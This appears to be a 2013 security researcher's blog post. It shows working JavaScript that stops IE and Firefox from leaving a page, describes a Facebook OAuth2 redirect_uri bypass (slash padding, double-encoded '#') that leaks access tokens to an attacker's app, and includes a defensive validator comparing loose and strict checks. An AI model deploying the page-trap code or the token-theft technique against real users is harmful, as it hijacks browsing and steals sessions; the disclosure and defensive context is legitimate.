Monthly Archives: March 2013

IE/Firefox Redirection Issue – FB Oauth2 Bypass – BugCrowd

To keep a record of the little things I have done since my last blog post:

1- IE/Firefox – Page Redirection Hijack

Several weeks ago, I reported an interesting PoC via my Twitter in which I had created a web page that prevents Firefox and IE from redirecting users to their intended destination, even if they had typed it directly into the address bar.

This issue is still unpatched in the latest versions of these browsers (March 2013). Unfortunately, some advert companies are currently exploiting this issue as well. I have already reported it to Mozilla.

Example 1: No Redirection Ever:

Here is the Javascript code that does this:

window.onbeforeunload = function(){

      //Unredirectable Page: when the user tries to leave, a navigation
      //back to the current page is scheduled and the alert() delays it.
      setTimeout("window.location=document.location;alert('delay by alert');",0);

};

Example 2: This always redirects you to

Here is the Javascript code that does this:

window.onbeforeunload = function(){

      //Unredirectable Page: same trick, but the scheduled navigation goes
      //to a fixed target (the URL is omitted on this page)
      setTimeout("window.location='';alert('delay by alert');",0);

};


2- Facebook OAuth2 Bypass

Facebook OAuth2: yet another redirection bypass! I only found one issue, which was very similar to what Nir Goldshlager and Egor Homakov had reported to Facebook. I highly recommend reading their blog posts about Facebook OAuth2 for learning!

Here is what I have found in Facebook:

The following URL could send your session to the attacker’s domain, where he could hijack your OAuth token: Link …&redirect_uri=

It used to work in all browsers. However, you needed to find an authorised Facebook app in order to exploit this issue.

A short description:

– “/////” in the URL -> to bypass an IE problem with the Facebook redirection

– “candycrush1” -> to redirect the user to a normal user page instead of the candycrush game! “” takes you to a user page instead of an App!

– “%2523” and “%23” (double- and single-encoded “#”) -> to remove the # from the final URL and send the token directly in the URL.

The result of loading that URL was:

in which “testrdirsdl” is my app that can store the tokens in “” (it does not have logging functionality at the moment!)
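All three tricks above exploit loose matching of the redirect_uri parameter. The following is an added example, not code from the original post and not Facebook's implementation: it puts a host-only check, which accepts the padded-slash, encoded-“#” and extra-query variants, next to an exact component-by-component check that rejects them. The registered URI, function names and sample inputs are constructed for the demonstration.

```javascript
// Registered redirect URIs of a hypothetical client app (constructed for
// this example; nothing here is Facebook's real configuration).
const REGISTERED_REDIRECT_URIS = [
  "https://app.example/oauth/callback",
];

function parseUrl(s) {
  try {
    return new URL(s);
  } catch (e) {
    return null; // unparsable input is never a valid redirect target
  }
}

// Loose check: only the host is compared, a common mistake. Path padding
// (/////), percent-encoded "#" (%23, %2523) and extra query parameters
// all pass, because none of them touches the host.
function looseRedirectCheck(candidate) {
  const u = parseUrl(candidate);
  if (u === null) return false;
  return REGISTERED_REDIRECT_URIS.some((r) => new URL(r).hostname === u.hostname);
}

// True if one or two rounds of percent-decoding reveal a "#", i.e. a
// fragment delimiter that a later decoding step would make real.
function containsEncodedHash(candidate) {
  let current = candidate;
  for (let round = 0; round < 2; round++) {
    try {
      current = decodeURIComponent(current);
    } catch (e) {
      return true; // malformed escapes: reject rather than guess
    }
    if (current.includes("#")) return true;
  }
  return false;
}

// Strict check: the candidate must equal a registered URI component by
// component (scheme, host:port, exact path, exact query) and carry no
// fragment, no encoded "#" and no userinfo.
function strictRedirectCheck(candidate) {
  const u = parseUrl(candidate);
  if (u === null) return false;
  if (u.hash !== "" || u.username !== "" || u.password !== "") return false;
  if (containsEncodedHash(candidate)) return false;
  return REGISTERED_REDIRECT_URIS.some((r) => {
    const reg = new URL(r);
    return (
      reg.protocol === u.protocol &&
      reg.host === u.host &&          // host including the port
      reg.pathname === u.pathname &&  // "/////oauth/callback" !== "/oauth/callback"
      reg.search === u.search         // no smuggled query parameters
    );
  });
}

// Run both checks over the kinds of redirect_uri discussed in the post
// (sample values constructed for the demonstration).
function compareChecks() {
  const samples = [
    "https://app.example/oauth/callback",
    "https://app.example/////oauth/callback",
    "https://app.example/oauth/callback%23",
    "https://app.example/oauth/callback%2523",
    "https://app.example/oauth/callback?next=https://attacker.example/",
    "https://attacker.example/oauth/callback",
  ];
  return samples.map((s) => ({
    uri: s,
    loose: looseRedirectCheck(s),
    strict: strictRedirectCheck(s),
  }));
}

if (typeof require !== "undefined" && require.main === module) {
  for (const row of compareChecks()) {
    const l = row.loose ? "loose:ACCEPT" : "loose:reject";
    const s = row.strict ? "strict:ACCEPT" : "strict:reject";
    console.log(`${l}  ${s}  ${row.uri}`);
  }
}
```

Only the first sample survives the strict check; the host-only check lets the first five through. Comparing the parsed components, rather than prefixes or substrings of the raw string, is what makes the padded slashes and the encoded “#” fail, and rejecting any fragment (literal or encoded) matches RFC 6749's rule that redirect URIs must not contain one.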

3- BugCrowd!

I attended several bounties and gladly received $$$ for private and public bounties! I liked the charity ones as well :-)

If you want to test a variety of live websites without legal worries (well, I hope they can provide us with a signed document per project very soon!), it is the right place. I recommend it to people who want to have fun and improve their web application security testing skills.

Unfortunately, the recent bounties from BugCrowd did not have fair prizes, and I guess it is because of the companies’ budgets. Moreover, we still need them to come up with the hall of fame table! As soon as they sort these out, I will become more interested!

That’s it for now. Thanks for your time.